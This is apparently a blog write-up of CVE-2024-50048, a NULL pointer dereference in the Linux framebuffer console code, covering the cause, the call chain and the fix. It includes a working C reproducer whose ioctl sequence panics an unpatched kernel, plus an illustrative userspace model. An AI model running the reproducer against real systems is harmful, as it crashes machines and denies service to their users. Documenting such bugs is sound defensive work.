In the Linux kernel, a recently resolved vulnerability (CVE-2024-50048) addressed a NULL pointer dereference in the fbcon_putcs function that could lead to a kernel panic. The bug was discovered by syzbot, the automated bug-finding system for the Linux kernel. This post provides details about the bug, including a simplified C reproducer, the resolution, and links to the original references for further information.
Here is a simplified C reproducer for this vulnerability (the one attached to the upstream fix, with the zero literals restored and the headers it needs added):
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/fb.h>      /* struct fb_con2fbmap, FBIOPUT_CON2FBMAP */
#include <linux/tiocl.h>   /* struct tiocl_selection */

struct param {
	uint8_t type;              /* TIOCLINUX subcode; 2 == TIOCL_SETSEL */
	struct tiocl_selection ts;
};

int main(void)
{
	struct fb_con2fbmap con2fb;
	struct param param;

	int fd = open("/dev/fb1", 0, 0);

	/* Map console 0x19 onto framebuffer 0. */
	con2fb.console = 0x19;
	con2fb.framebuffer = 0;
	ioctl(fd, FBIOPUT_CON2FBMAP, &con2fb);

	/* Set a text selection on tty1 through TIOCLINUX. */
	param.type = 2;
	param.ts.xs = 0; param.ts.ys = 0;
	param.ts.xe = 0; param.ts.ye = 0;
	param.ts.sel_mode = 0;

	int fd1 = open("/dev/tty1", O_RDWR, 0);
	ioctl(fd1, TIOCLINUX, &param);

	/* Remap console 1 onto framebuffer 0; the redraw this triggers reaches ops->putcs. */
	con2fb.console = 1;
	con2fb.framebuffer = 0;
	ioctl(fd, FBIOPUT_CON2FBMAP, &con2fb);

	return 0;
}
After ioctl(fd1, TIOCLINUX, &param) followed by ioctl(fd, FBIOPUT_CON2FBMAP, &con2fb), the kernel takes a different execution path:
set_con2fb_map
-> con2fb_init_display
-> fbcon_set_disp
-> redraw_screen
-> hide_cursor
-> clear_selection
-> highlight
-> invert_screen
-> do_update_region
-> fbcon_putcs
-> ops->putcs
Because ops->putcs is still a NULL pointer at that point, the call causes a kernel panic. The fix is to call set_blitting_type() within set_con2fb_map() so that ops->putcs is properly initialized before the redraw reaches it.
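To make the ordering problem concrete, here is an added userspace C model of the bug; it is not kernel code and not part of the upstream fix. The struct and function names are simplified stand-ins for the kernel functions in the call chain above, and the redraw step reports a NULL function pointer instead of dereferencing it, which is where the real kernel would oops. The "before" variant redraws before set_blitting_type() has filled in ops->putcs; the "after" variant initializes it first, which is the ordering the fix establishes in set_con2fb_map().

```c
#include <stdio.h>
#include <stddef.h>

/* Simplified stand-in for struct fbcon_ops: only the member that matters here. */
struct fbcon_ops {
	void (*putcs)(const char *s, int count);
};

/* Simplified stand-in for a virtual console that carries an ops table. */
struct vc_model {
	struct fbcon_ops *ops;
	int last_drawn;          /* how many characters the last redraw pushed out */
};

static struct fbcon_ops g_ops;   /* shared ops table; putcs starts out NULL */
static int g_last_count;

static void model_putcs(const char *s, int count)
{
	(void)s;
	g_last_count = count;
}

/* Stand-in for set_blitting_type(): this is what fills in ops->putcs. */
static void set_blitting_type(struct vc_model *vc)
{
	vc->ops->putcs = model_putcs;
}

/* Stand-in for redraw_screen -> hide_cursor -> ... -> fbcon_putcs -> ops->putcs.
 * Returns 0 when putcs was available and called, -1 when the real kernel
 * would have dereferenced a NULL ops->putcs. */
static int redraw_screen(struct vc_model *vc, const char *text, int count)
{
	if (vc->ops == NULL || vc->ops->putcs == NULL)
		return -1;
	vc->ops->putcs(text, count);
	vc->last_drawn = count;
	return 0;
}

/* Vulnerable ordering: the redraw runs before the ops table is initialized. */
static int set_con2fb_map_before_fix(struct vc_model *vc)
{
	int rc = redraw_screen(vc, "sel", 3);   /* ops->putcs is still NULL here */
	set_blitting_type(vc);                  /* initialization arrives too late */
	return rc;
}

/* Fixed ordering: set_blitting_type() first, then the redraw. */
static int set_con2fb_map_after_fix(struct vc_model *vc)
{
	set_blitting_type(vc);
	return redraw_screen(vc, "sel", 3);
}

/* Build a fresh console model whose ops table has not been initialized. */
static void reset_model(struct vc_model *vc)
{
	g_ops.putcs = NULL;
	g_last_count = 0;
	vc->ops = &g_ops;
	vc->last_drawn = 0;
}

/* Run one variant on a fresh model and return the redraw result. */
int run_before_fix(void)
{
	struct vc_model vc;
	reset_model(&vc);
	return set_con2fb_map_before_fix(&vc);
}

int run_after_fix(void)
{
	struct vc_model vc;
	reset_model(&vc);
	return set_con2fb_map_after_fix(&vc);
}

int main(void)
{
	printf("before fix: %d (-1 means ops->putcs was NULL at redraw time)\n", run_before_fix());
	printf("after fix:  %d (0 means putcs was initialized before the redraw)\n", run_after_fix());
	return 0;
}
```

The model keeps the kernel's shape on purpose: the ops table exists but one of its function pointers is unset until a separate initialization step runs, so any code path that can reach the table between its allocation and that step is a NULL dereference waiting to happen. The defensive lesson is the one the fix applies, which is to make initialization precede every path that can dispatch through the table, rather than to guard each call site.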
The following links provide the original references and information related to this vulnerability:
- syzbot Overview
- Linux Kernel Mailing List (LKML) Vulnerability Report
- Resolved Vulnerability Patch
CVE-2024-50048 in the Linux kernel has been resolved by properly initializing ops->putcs, which prevents the NULL pointer dereference in fbcon_putcs and the resulting kernel panic.
Timeline
Published on: 10/21/2024 20:15:17 UTC
Last modified on: 11/19/2024 01:15:14 UTC